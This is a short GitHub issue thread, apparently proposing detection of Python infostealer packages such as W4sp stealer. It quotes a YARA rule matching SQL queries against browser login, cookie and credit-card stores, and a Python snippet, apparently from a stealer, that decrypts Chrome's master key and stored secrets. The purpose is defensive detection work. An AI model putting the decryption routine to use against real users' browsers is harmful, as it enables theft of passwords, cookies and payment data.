Closed christophetd closed 1 year ago
Several stealers such as W4sp stealer, and reols package
See also: https://www.virustotal.com/gui/file/f1fed89b8db4855ff9adbb517b21f136ccc359c4caba2852e57994773501128a from https://github.com/ditekshen/detection:
rule INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore { meta: author = "ditekSHen" description = "Detects executables containing SQL queries to confidential data stores. Observed in infostealers" strings: $select = "select " ascii wide nocase $table1 = " from credit_cards" ascii wide nocase $table2 = " from logins" ascii wide nocase $table3 = " from cookies" ascii wide nocase $table4 = " from moz_cookies" ascii wide nocase $table5 = " from moz_formhistory" ascii wide nocase $table6 = " from moz_logins" ascii wide nocase $column1 = "name" ascii wide nocase $column2 = "password_value" ascii wide nocase $column3 = "encrypted_value" ascii wide nocase $column4 = "card_number_encrypted" ascii wide nocase $column5 = "isHttpOnly" ascii wide nocase condition: uint16(0) == 0x5a4d and 2 of ($table*) and 2 of ($column*) and $select }
Also often coupled with win32crypt.CryptUnprotectData e.g.
win32crypt.CryptUnprotectData
def tahg(pene): x = json.loads(open(os.environ['LOCALAPPDATA'] + "\\Google\\Chrome\\User Data\\Local State", "r", encoding="utf-8").read()) try: mk = win32crypt.CryptUnprotectData(base64.b64decode(x["os_crypt"]["encrypted_key"])[5:], None, None, None, 0)[1] except: mk = "" try: return (AES.new(mk, AES.MODE_GCM, pene[3:15]).decrypt(pene[15:])[:-16]).decode() except: return ""
closing as dupe of #232
christophetd
commented
1 year ago christophetd
commented
1 year ago
Several stealers such as W4sp stealer, and reols package
See also: https://www.virustotal.com/gui/file/f1fed89b8db4855ff9adbb517b21f136ccc359c4caba2852e57994773501128a from https://github.com/ditekshen/detection:
Also often coupled with
win32crypt.CryptUnprotectDatae.g.